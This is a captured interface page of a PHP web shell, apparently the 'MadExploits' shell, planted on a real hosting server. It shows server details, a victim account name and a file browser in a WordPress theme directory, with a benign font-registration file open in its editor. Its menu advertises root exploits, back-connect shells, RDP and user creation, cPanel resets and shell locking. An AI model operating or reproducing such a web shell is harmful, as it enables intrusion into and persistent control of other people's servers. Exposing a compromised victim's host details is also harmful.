Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
helper
[ DIR ]
drwxr-xr-x
lab
[ DIR ]
drwxr-xr-x
options
[ DIR ]
drwxr-xr-x
underscore
[ DIR ]
drwxr-xr-x
comment-form.php
6.49
KB
-rw-r--r--
comment-nav.php
585
B
-rw-r--r--
demo-import-config.php
22.07
KB
-rw-r--r--
global-functions.php
4.89
KB
-rw-r--r--
register-custom-fonts.php
1.14
KB
-rw-r--r--
scripts.php
4.5
KB
-rw-r--r--
tgm-config.php
2.29
KB
-rw-r--r--
widget-area-register.php
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : register-custom-fonts.php
<?php /** * Register custom fonts. */ if ( !function_exists( 'rbt_fonts_url' ) ) : function rbt_fonts_url() { $fonts_url = ''; $fonts = array(); $subsets = 'latin,latin-ext'; /* translators: If there are characters in your language that are not supported by Nunito+Sans Sans, translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Montserrat font: on or off', 'imroz' ) ) { $fonts[] = 'Montserrat:400,400i,500,600,700,800,900'; } /* translators: If there are characters in your language that are not supported by Nunito+Sans Sans, translate this to 'off'. Do not translate into your own language. */ if ( 'off' !== _x( 'on', 'Poppins font: on or off', 'imroz' ) ) { $fonts[] = 'Poppins:300,400,500,600,700,700i'; } if ( $fonts ) { $fonts_url = add_query_arg( array( 'family' => urlencode( implode( '|', $fonts ) ), 'subset' => urlencode( $subsets ), ), 'https://fonts.googleapis.com/css' ); } return esc_url_raw($fonts_url); } endif;
Close